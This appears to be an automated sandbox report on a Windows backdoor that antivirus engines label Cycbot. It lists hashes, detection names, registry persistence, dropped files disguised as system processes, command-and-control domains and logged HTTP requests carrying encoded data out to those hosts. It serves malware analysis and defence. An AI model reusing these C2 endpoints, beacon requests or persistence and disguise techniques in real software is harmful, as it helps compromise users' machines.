Analysis Date: 2014-06-16 00:29:56
MD5: 6b93ccca7f9de8161acac7960ccaf5fa
SHA1: 4fbc639361826a2551cb2386528cb3d0310e291a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section: .text md5: 9f3b667298691183610abef5376b00d1 sha1: 98cc0d6309a3e8f222d5be33c1345e6b0382a586 size: 167936
Section: .rdata md5: 1515eb278877563d4d2c213b797aa9a1 sha1: 719de45f9162ebe314c8d3e5007adcf3e96094ae size: 2048
Section: .data md5: dbae3777910393599cabf875f0e5f005 sha1: 079a7e2af78311479efb2680fda44f2783036115 size: 20480
Section: .tls md5: 334e1c5c8a9439cfcfdf1f1d096467b8 sha1: 54676a9efa0bbbf21913b9c7db1772bffc8f0c42 size: 512
Timestamp: 2005-09-01 14:29:56
Version: PrivateBuild: 1474
PEhash: 6eb7df2c2c25a8bff61f36591312f5f4ce471868
IMPhash: 67de8074d9f608cce971e9d5370c80fd
AV: 360 Safe: Trojan.Generic.5508835
AV: Ad-Aware: Trojan.Generic.5508835
AV: Alwil (avast): Cybota [Trj]
AV: Arcabit (arcavir): no_virus
AV: Authentium: W32/Goolbot.E.gen!Eldorado
AV: Avira (antivir): TR/Kazy.14157.psa
AV: CA (E-Trust Ino): Win32/Diple.A!generic
AV: CAT (quickheal): Backdoor.Cycbot.B
AV: ClamAV: Trojan.Cycbot-9
AV: Dr. Web: Trojan.DownLoad2.21894
AV: Emsisoft: Trojan.Generic.5508835
AV: Eset (nod32): Win32/Kryptik.LDT
AV: Fortinet: W32/FraudLoad.MK!tr
AV: Frisk (f-prot): W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AV: F-Secure: Trojan.Generic.5508835
AV: Grisoft (avg): Cryptic.CFW
AV: Ikarus: Trojan-Spy.Win32.Zbot
AV: Kaspersky: Backdoor.Win32.Gbot.aci
AV: MalwareBytes: Spyware.Passwords.XGen
AV: Mcafee: BackDoor-EXI.gen.i
AV: Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan): Trojan.Generic.5508835
AV: Norman: winpe/Cycbot.BP
AV: Rising: no_virus
AV: Sophos: Mal/FakeAV-IS
AV: Symantec: Backdoor.Cycbot!gen3
AV: Trend Micro: BKDR_CYCBOT.SME3
AV: VirusBlokAda (vba32): Trojan.Diple

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: ordergreentee.com
Winsock DNS: 127.0.0.1
Winsock DNS: realsoftwaredevelopment.com
Winsock DNS: cofeeandteeshop.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: realsoftwaredevelopment.com (Type: A) ➝ 141.101.116.129
DNS: realsoftwaredevelopment.com (Type: A) ➝ 141.101.117.129
DNS: zonetf.com (Type: A) ➝ 208.73.211.164
DNS: zonetf.com (Type: A) ➝ 208.73.211.249
DNS: zonetf.com (Type: A) ➝ 208.73.211.236
DNS: zonetf.com (Type: A) ➝ 208.73.211.182
DNS: zonetf.com (Type: A) ➝ 208.73.211.177
DNS: ordergreentee.com (Type: A)
DNS: cofeeandteeshop.com (Type: A)
HTTP GET: http://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif?v14=53&tq=gKZEtzyH5C6HzpJO%2Bfd2kbeR40bEcQtYFgXODKxz7nG13v61ixwdMIq01KyvHC5Lkh%2FYiwyYUJaIMH0%2Bd7d0mhykLS2VG600fNlm32TdLQ%2Fp3ZBR5kuj4N%2BIFyvbggk8%2BMSfJEcqpl9ACNnX%2BTpRM2WJoUksedSKJGOshCVp1uc00Lv4yyYnpDCP%2BfeuGXGHJkg1GYGA3UkuV8hbfoBMYcJBP7lJi3IaFMShAu2X3%2FcVuGEpMdtpfp1HhPBm6lfsFnqZXsuX%2BYNSGSiJC5jmJSMK%2BF6tUKUlSexEU62nTF%2FMmJBkIktqbAXytEXF6MvszXvL%2BAWw%2Bw6sURqimGRdfZdn31hX0V4qw8sVenWaI%2FGaaUlqkHYocGoQi%2BgKIL3GS0vL6V9M4cq9A45kLPKzaw%2BV4IcHAY0pgmCVczUvWuv9Mnw
User-Agent: mozilla/2.0
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNsX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 141.101.116.129:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.211.164:80
Flows TCP: 192.168.1.1:1034 ➝ 208.73.211.177:80

Raw Pcap

Strings
040904b0
1474
HFGa
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
ADVAPI32.dll
CancelIo
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
CreateDialogParamA
CreateFiber
CreateSemaphoreA
CryptCreateHash
CryptDestroyHash
CryptDestroyKey
CryptEncrypt
CryptGetHashParam
CryptHashData
CryptImportKey
CryptReleaseContext
@.data
DestroyWindow
DispatchMessageA
EnumResourceNamesW
GetACP
GetCurrentThread
GetCurrentThreadId
GetDesktopWindow
GetLastError
GetQueueStatus
GetSystemTime
GetThreadPriority
GetTickCount
GetUserNameA
InternetCloseHandle
InternetOpenA
InternetOpenUrlA
InternetReadFile
IsBadReadPtr
KERNEL32.dll
lstrcatA
MsgWaitForMultipleObjects
PeekMessageA
PostThreadMessageA
`.rdata
RealGetWindowClassA
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
SetThreadPriority
SETUPAPI.dll
SetupDiGetDeviceRegistryPropertyW
ShowWindow
!This program cannot be run in DOS mode.
timeGetTime
timeSetEvent
USER32.dll
VirtualFree
WaitForMultipleObjects
WININET.dll
WINMM.dll
wsprintfA
wvsprintfA